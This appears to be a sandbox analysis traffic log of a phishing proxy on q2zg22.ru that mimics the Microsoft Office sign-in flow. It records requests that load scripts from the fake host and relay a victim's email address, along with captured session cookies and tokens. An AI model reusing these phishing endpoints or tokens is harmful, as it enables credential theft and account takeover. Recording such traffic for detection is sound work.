.AspNetCore.OpenIdConnect.Nonce.3jhMw8SJjRQQ85vjmH1_74VX9hJGNnEkAciwcD5tIBTyllLGszLuwUTbipr2TkOBxrMopwhLhtER6dDoFtL5a56Uri3z7Hg1ZLzrfrA5a-LoowCS6BHS_rNQNlZ6A64OM6HSXA9CzVOr3Q-XeYJmhQwySjHQMIVGXXMyGuRNsVu13kVmDxRzQ_RuO_WSOVL-9NbV02OK1-tYRMfj1tkERwUczs58TE3Mi5WuyjhlBxsMAD2eer0ZCPktm21ooadm=N; .AspNetCore.Correlation.mueLpLFnUtogf9G56f_hDsFC0GbvqHch3Aa_N7_HoU4=N
              Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0 HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://galeonconstruction.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhG
              Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSPRequ=id=N&lt=1706901476&co=5; uaid=c9bbf5863cb749e4968c855cb9b06dff; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRwSr4Ehgvl*Bev7I*ATli20PRk0RjblHLcmktfUWdSqNnhmJoxeE7yK3X847MpAPDrhdN86deMO3UBa5fmkhZS3qLKPMbybRkXQIvC!Va*6GVfGrBSQ93o*2PBUw8jmtevb8rpJiyYEc7xzk2tKqQkA5et6feN9QEWIe3cWw6o4PT7GcptF2igE7SY590WIaLoA8uG0ARkB4kNJzB2NPOmI1zuGdX7ohRBcncoEkSESvJ5HpbJjoOGS2zR2A7YX0oS5QJHI0IUgQNn1FB8SgbZDMALKS!sTrMV33GgBe7d8dwLCEnNXMZS2!3Sk8jnKDp1NiIBhpMlDp1x01x2jymLrcjeEXA4BgjQ$$; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1Host: office.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx
              Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRwSr4Ehgvl*Bev7I*ATli20PRk0RjblHLcmktfUWdSqNnhmJoxeE7yK3X847MpAPDrhdN86deMO3UBa5fmkhZS3qLKPMbybRkXQIvC!Va*6GVfGrBSQ93o*2PBUw8jmtevb8rpJiyYEc7xzk2tKqQkA5et6feN9QEWIe3cWw6o4PT7GcptF2igE7SY590WIaLoA8uG0ARkB4kNJzB2NPOmI1zuGdX7ohRBcncoEkSESvJ5HpbJjoOGS2zR2A7YX0oS5QJHI0IUgQNn1FB8SgbZDMALKS!sTrMV33GgBe7d8dwLCEnNXMZS2!3Sk8jnKDp1NiIBhpMlDp1x01x2jymLrcjeEXA4BgjQ$$; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212; uaid=8513f9b5312d44168775f3619e83fea6; MSPRequ=id=N&lt=1706901506&co=0
              Source: global trafficHTTP traffic detected: GET /common/GetCredentialType?mkt=en-US HTTP/1.1Host: office.q2zg22.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-hE7W-3HlJa9owQFnQJrRENYP0J9Z8A-K4WnZMGz7A5QqO0kXsumO3i8krFA5k1OOPVOxoHJmIILqI1PwJRpWBA8-0mMatTVn8txshoM21rkgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6sTAqDqt7ElFdN1sJSaDq_ggXMYVMb3uFYjIUVq62UeBPW3IB1LLdQHLQLLWtDHFMCnGz_YASr9t1IZ44yG-lHE2RWEbLOxEiDD7CCS16c7IvvS0q5msftUfTo962NYUj6qggkeRtHO1iFZB-mBEoCFjaDe7d9mg2e5R4XwYOGIgAA; esctx-yQ0qBjjSemE=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-iwnOVAzk-mItPYr1eQ-sYWbmhyqBBdm4z6h7jGV3ZTXukH7TxUtzWNjtL_t73Uz9IBQF2UFqfSEiaPZFY9iL4PQjdyE08trjoIqH9KdicIyP1dGJxUIK_srG1mb_8kyCjl8feyTl_S4jJh_EKFvwBSAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAgAAAN82T90OAAAA
              Source: global trafficHTTP traffic detected: GET /oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuxG8f2BFJIZEtbl3BqgvaQaY4NjmYaKcMNXs_n1rWbgyAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: 